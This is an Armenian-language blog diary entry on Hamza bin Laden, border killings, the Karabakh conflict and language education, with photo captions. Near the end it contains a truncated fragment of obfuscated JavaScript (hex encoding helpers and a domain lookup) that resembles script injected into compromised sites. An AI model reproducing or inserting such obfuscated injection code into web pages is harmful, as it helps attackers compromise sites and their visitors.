Հինգ տարի առաջ Պակիստանում ոչնչացված «Ալ-Քաիդա»-ի ղեկավար Ուսամա բեն Լադենի կենդանի մնացած որդին՝ Համզան, պարաստ է գրավելու հոր տեղը՝ միավորելով ահաբեկչական ցանցի մնացորդները, ներառյալ հանրահայտ «Ջաբհաթ ան-Նուսրան» Սիրիայում: Համզան 2011-ին ԱՄՆ-ի օպերացիայի ժամանակ հոր հետ տանը չի եղել և չի սպանվել … Գնացել է ահաբեկչական գործունեություն սովորելու՝ ըստ CNN-ի և հիմա Երուսաղեմի ազատագրական հսկայական բանակ կստեղծի. «Պաղեստին ճանապարհը անցնում է Սիրիայով, որը դարձել է ջիհադի հողը»… Սպանվե՞լ է բեն Լադենի գաղափարը-գործը 2011-ին. թե՞ նրա մարմինը լոկ… Այս դեպքում ինչո՞ւ էին այդքան մեծ կարևորություն հաղորդում ամերիկացիները մի մարմնի, ֆիզիկական մարմինների ոչնչացմանը:

Իսկ երեկ, Վայոց ձորի մարզի Վայքի սահմանապահ դիրքերում, հակառակորդի կրակոցից մահացել է 25-ամյա զինծառայող Արամ Օհանյանը… Հայ-ադրբեջանական սահմանի ողջ երկարությունը 566 կմ՝ Հայաստան-Արցախ՝ գրավյալ տարածքներով, փաստացի, այսօր ռազմաճակատի գիծ է՝ 566 կիլոմետրանոց… Չգիտեմ՝ ընթերցողը պատկերացնո՞ւմ է… Եթե Ղարաբաղը դարձավ մի նոր գաղափար ջիհադի*, սրբազան պատերազմի, այդպես ապրել ո՞նց կլինի… սահմանի այս դին այն դին…չի՛ լինի: Ես սա գիտեի, բարեկամներ, 1989-ին, երբ նորաստեղծ քաղաքական կազմակերպության ՀՀՇ-ի հիմնադիր համագումարում դարձա Հայոց համազգային շարժման կուսակցության վարչության անդամ… Ես սա գիտեի ու փորձեցի իմ քաղաքական կյանքով իրական դարձնել նոր ուղին հայոց համար… Մնացածը իմ կյանքն է, որ ես ապրել-ապրում եմ, պատմել-պատմում եմ, միշտ բաց-միշտ հրապարակային…

«Եթե չկա ժողովրդի շահերը ներկայացնող քաղաքական ուժ, նա գնում է իշխանության հետ պասիվ կամ ակտիվ գործակցության, իսկ ընդդիմությունը իրականում իշխանության արևի տակ է գտնում իր տեղը…»… Նարեկ Սամսոնյանին առիթներ ունեցել եմ ձեզ ներկայացնելու, հիմա էլ՝ համեցեք, արժե դիտել այս տեսանյութը՝ 15 րոպեանոց:

Հասակի չափումներ:
Լուսանկարները՝ Արմինե Աբրահամյանի:

Ռուսերեն կարդացեք, իմ իմացած-գործածական միակ օտար լեզվով.
«Ղարաբաղի հակամարտություն. ինչպես հաղթահարել ատելությունը». Կաբարդինո Բալկարիայի (ՌԴ) պետհամալսարանի մաթեմատիկայի դասախոս Ռոբերտ Ղազարյանի հոդվածի հղումը ինձ տրամադրել է Աշոտ Տիգրանյանը՝ մեծահոգաբար, չնայած, որ «չի կիսում շարադրված մոտեցումը, բայց…»:

«Ի դեպ, հայերն ու ադրբեջանցիները իրենց տարածքներից դուրս  խաղաղ են ապրում, բարեկամաբար, ու  հիվանդագին են վերաբերվում ստեղծված իրավիճակին: Սա պատահական չէ: Աստված հենց այդպես է կամեցել, որ հայերն ու ադրբեջանցիները դառնան հարևաններ ու ապրեն կողք կողքի: Հայերը, վրացիները, ադրբեջանցիները ապրել են Անդրկովկասում մեկ միասնական տեղեկատվության և մշակութային տարածության մեջ, այնպես որ յուրաքանչյուր ազգի ներկայացուցիչ իր բացառիկ ներդրումն է արել բազմազգ Անդրկովկասի քաղաքակրթության զարգացման գործում:»
Վարդաձոր գյուղից պատկերներ:
Լուսանկարները՝ Արմինե Թոփչյանի:

Օրեր առաջ, կրթահամալիրի կենտրոնական ընթերցարանում, երբ քննարկում էինք հայ-իրանական հանրակրթական կամուրջի իրագործման կոնկրետ-կարևոր հարց՝ իրանական կողմի միջնորդությամբ ներկայացել էր կրթահամալիրում իրանական ակումբի-լեզվի ղեկավար Արմանը՝ գրավիչ, հասուն ուսանող, արևելագետ, Երևանի պետական համալսարանից, մեր ինքնաբուխ կլոր սեղանի թեմա դարձավ ռուսերենի նկատմամբ սովորողների, երիտասարդների, հասարակության բացասական դարձող վերաբերմունքը… Գործածենք ռուսերենը տարատարիք սովորողին գրավիչ, կյանքի խնդիրներ լուծելու, իր կյանքում ավելի ու ավելի արդյունավետ դարձնելով անգլերենի ուսուցումը՝ կիրառական մակարդակում, սկսած միջին դպրոցի 5-6-րդ դասարանից, հիմա, ճամբարային-ստուգատեսային-ամառային-նախագծային առօրյայում և մեծ թվով սեբաստացիների համար ավելի նախընտրելի դարձնենք երրորդ օտար լեզուն՝ գերմաներենի, ֆրանսերենի, իսպաներենի, վրացերենի, պարսկերենի, թուրքերենի, հունարենի… ադրբեջաներենի, այո՝ նաև ադրբեջաներենի, որպես հնարավոր մասնագիտական գործունեության լեզու, մասնագիտական աջակցության և առավելության…

Վարդաձորի Արմինե հարսիկի գաթան:
Լուսանկարները՝ Արմինե Թոփչյանի:

Իմ ընթերցարանը կիրակնօրյա շարունակեմ հաստատ-կիրառելի կենցաղային ներարկումներով…

Այո-ն դու ասում ես, որպես գո՞րծ քո երկրի, ամե՞ն օր… Սա էլ անցնող շաբաթվա խորհուրդը թող լինի, որպես երկրագործ, սեբաստացի թե ոչ սեբաստացի իմ օրագրի ընթերցող:

Ջիհադ — հասկացություն իսլամում, որը նշանակում է ջանասիրություն Ալլահի ճանապարհին։ Սովորաբար ջիհադը նույնացվում է զինված պայքարի հետ, սակայն հասկացությունն ինքնին բավականին լայն է։

Մեկ օր Գեղարքունիքի մարզում:
Լուսանկարները՝ Արմինե Թոփչյանի:

#672

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Թողնել պատասխան

Ձեր էլ-փոստի հասցեն չի հրապարակվելու։ Պարտադիր դաշտերը նշված են *-ով

Explore More

Որ Ձմեռ պապը շվարի-մնա…

Անհատական ջանքի ու աշխատանքի խրախուսման մասին է իմ օրագիրը… Այսպիսով իմ նախածննդյան-ետծննդյան արձակուրդներն ավարտվեցին շոշափելի արդյունքով՝ Աստղիկ Բլեյանը այսօր 6 օրական է, ժամ-ժամ ուժ-գեղեցկություն առնող: Արմինեն, իհարկե, մեկ է գոհ

Լավ է ուշ, քան ավելի ուշ… Հիմա է իմ օրը…

Բաժակները զարկէք չին-չին Անեզրութեան եւ ոչինչին կենաց չին-չին Անվերադարձ ճամբաներուն կենաց չին-չին Եւ անցեալի ձեր սէրերուն Տարին ինչպես դիմավորես, այնպես էլ կանցկացնես… Տարողունակ պնդում է, չէ՞։ Ինչպես-ը ինչո՞վն է՝ գործերո՞վ,